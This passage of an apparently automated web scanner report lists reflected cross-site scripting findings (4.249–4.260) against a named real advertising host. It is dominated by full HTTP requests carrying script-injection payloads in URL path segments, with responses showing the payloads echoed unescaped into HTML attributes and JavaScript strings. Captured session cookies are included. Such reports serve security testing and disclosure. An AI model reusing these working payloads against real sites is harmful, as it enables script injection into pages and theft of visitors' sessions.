Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1f18360b4f3975e3c=1c856c1bcda2b173dfe396a05cf7a236

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:37:51 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:37:51 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13474

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/modules/systemdafeb"-alert(1)-"493cbb0ab09/system-menus.css?7";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,adv
...[SNIP]...
4.249. http://nai.glb.adtechus.com/modules/system/system.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.glb.adtechus.com
Path:   /modules/system/system.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce561"-alert(1)-"5fc77efe479 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /modulesce561"-alert(1)-"5fc77efe479/system/system.css?7 HTTP/1.1
Host: nai.glb.adtechus.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://nai.glb.adtechus.com/nai/daa.php7f0ce%22-alert(document.location)-%22a235be901d?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481
Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1f18360b4f3975e3c=1c856c1bcda2b173dfe396a05cf7a236

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:37:12 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:37:12 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13450

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/modulesce561"-alert(1)-"5fc77efe479/system/system.css?7";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,ad
...[SNIP]...
4.250. http://nai.glb.adtechus.com/modules/system/system.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.glb.adtechus.com
Path:   /modules/system/system.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d8cc"><script>alert(1)</script>a602456b3bd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules9d8cc"><script>alert(1)</script>a602456b3bd/system/system.css?7 HTTP/1.1
Host: nai.glb.adtechus.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://nai.glb.adtechus.com/nai/daa.php7f0ce%22-alert(document.location)-%22a235be901d?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481
Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1f18360b4f3975e3c=1c856c1bcda2b173dfe396a05cf7a236

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:37:08 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:37:08 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13520

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://nai.glb.adtechus.com/modules9d8cc"><script>alert(1)</script>a602456b3bd/system/system.css?7" />
...[SNIP]...
4.251. http://nai.glb.adtechus.com/modules/system/system.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.glb.adtechus.com
Path:   /modules/system/system.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b6e5e"-alert(1)-"921d61cdf0a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /modules/systemb6e5e"-alert(1)-"921d61cdf0a/system.css?7 HTTP/1.1
Host: nai.glb.adtechus.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://nai.glb.adtechus.com/nai/daa.php7f0ce%22-alert(document.location)-%22a235be901d?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481
Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1f18360b4f3975e3c=1c856c1bcda2b173dfe396a05cf7a236

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:38:08 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:38:09 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13450

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/modules/systemb6e5e"-alert(1)-"921d61cdf0a/system.css?7";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advertisi
...[SNIP]...
4.252. http://nai.glb.adtechus.com/modules/system/system.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.glb.adtechus.com
Path:   /modules/system/system.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ad68"><script>alert(1)</script>9a8e51bf30a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/system6ad68"><script>alert(1)</script>9a8e51bf30a/system.css?7 HTTP/1.1
Host: nai.glb.adtechus.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://nai.glb.adtechus.com/nai/daa.php7f0ce%22-alert(document.location)-%22a235be901d?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481
Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1f18360b4f3975e3c=1c856c1bcda2b173dfe396a05cf7a236

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:38:00 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:38:00 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13520

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://nai.glb.adtechus.com/modules/system6ad68"><script>alert(1)</script>9a8e51bf30a/system.css?7" />
...[SNIP]...
4.253. http://nai.glb.adtechus.com/modules/user/user.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.glb.adtechus.com
Path:   /modules/user/user.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15e38"><script>alert(1)</script>afdff37ca6f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules15e38"><script>alert(1)</script>afdff37ca6f/user/user.css?7 HTTP/1.1
Host: nai.glb.adtechus.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://nai.glb.adtechus.com/nai/daa.php7f0ce%22-alert(document.location)-%22a235be901d?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481
Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1f18360b4f3975e3c=1c856c1bcda2b173dfe396a05cf7a236

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:37:16 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:37:16 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13504

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://nai.glb.adtechus.com/modules15e38"><script>alert(1)</script>afdff37ca6f/user/user.css?7" />
...[SNIP]...
4.254. http://nai.glb.adtechus.com/modules/user/user.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.glb.adtechus.com
Path:   /modules/user/user.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d372"-alert(1)-"cc4ed53bbfd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /modules9d372"-alert(1)-"cc4ed53bbfd/user/user.css?7 HTTP/1.1
Host: nai.glb.adtechus.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://nai.glb.adtechus.com/nai/daa.php7f0ce%22-alert(document.location)-%22a235be901d?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481
Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1f18360b4f3975e3c=1c856c1bcda2b173dfe396a05cf7a236

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:37:21 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:37:21 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13434

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/modules9d372"-alert(1)-"cc4ed53bbfd/user/user.css?7";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advert
...[SNIP]...
4.255. http://nai.glb.adtechus.com/modules/user/user.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.glb.adtechus.com
Path:   /modules/user/user.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2433c"><script>alert(1)</script>e219cac161d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/user2433c"><script>alert(1)</script>e219cac161d/user.css?7 HTTP/1.1
Host: nai.glb.adtechus.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://nai.glb.adtechus.com/nai/daa.php7f0ce%22-alert(document.location)-%22a235be901d?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481
Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1f18360b4f3975e3c=1c856c1bcda2b173dfe396a05cf7a236

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:38:14 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:38:14 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13504

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://nai.glb.adtechus.com/modules/user2433c"><script>alert(1)</script>e219cac161d/user.css?7" />
...[SNIP]...
4.256. http://nai.glb.adtechus.com/modules/user/user.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.glb.adtechus.com
Path:   /modules/user/user.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5d4bb"-alert(1)-"12d8f213a3d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /modules/user5d4bb"-alert(1)-"12d8f213a3d/user.css?7 HTTP/1.1
Host: nai.glb.adtechus.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://nai.glb.adtechus.com/nai/daa.php7f0ce%22-alert(document.location)-%22a235be901d?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481
Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1f18360b4f3975e3c=1c856c1bcda2b173dfe396a05cf7a236

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:38:22 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:38:22 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13434

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/modules/user5d4bb"-alert(1)-"12d8f213a3d/user.css?7";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advertising
...[SNIP]...
4.257. http://nai.glb.adtechus.com/nai/daa.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.glb.adtechus.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aba41"><script>alert(1)</script>543e73d8ce3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /naiaba41"><script>alert(1)</script>543e73d8ce3/daa.php?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481 HTTP/1.1
Host: nai.glb.adtechus.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:49:09 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:49:09 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13792

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://nai.glb.adtechus.com/naiaba41"><script>alert(1)</script>543e73d8ce3/daa.php?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481" />
...[SNIP]...
4.258. http://nai.glb.adtechus.com/nai/daa.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.glb.adtechus.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55e12"-alert(1)-"a0179e6b262 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nai55e12"-alert(1)-"a0179e6b262/daa.php?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481 HTTP/1.1
Host: nai.glb.adtechus.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:49:14 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:49:15 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13722

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai55e12"-alert(1)-"a0179e6b262/daa.php?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main"
...[SNIP]...
4.259. http://nai.glb.adtechus.com/nai/daa.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.glb.adtechus.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 194e1"><script>alert(1)</script>00d5cae3194 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /nai/daa.php194e1"><script>alert(1)</script>00d5cae3194?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481 HTTP/1.1
Host: nai.glb.adtechus.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:49:27 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:49:27 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13792

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://nai.glb.adtechus.com/nai/daa.php194e1"><script>alert(1)</script>00d5cae3194?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481" />
...[SNIP]...
4.260. http://nai.glb.adtechus.com/nai/daa.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.glb.adtechus.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f0ce"-alert(1)-"a235be901d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nai/daa.php7f0ce"-alert(1)-"a235be901d?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481 HTTP/1.1
Host: nai.glb.adtechus.com
Proxy-Connection: keep-alive
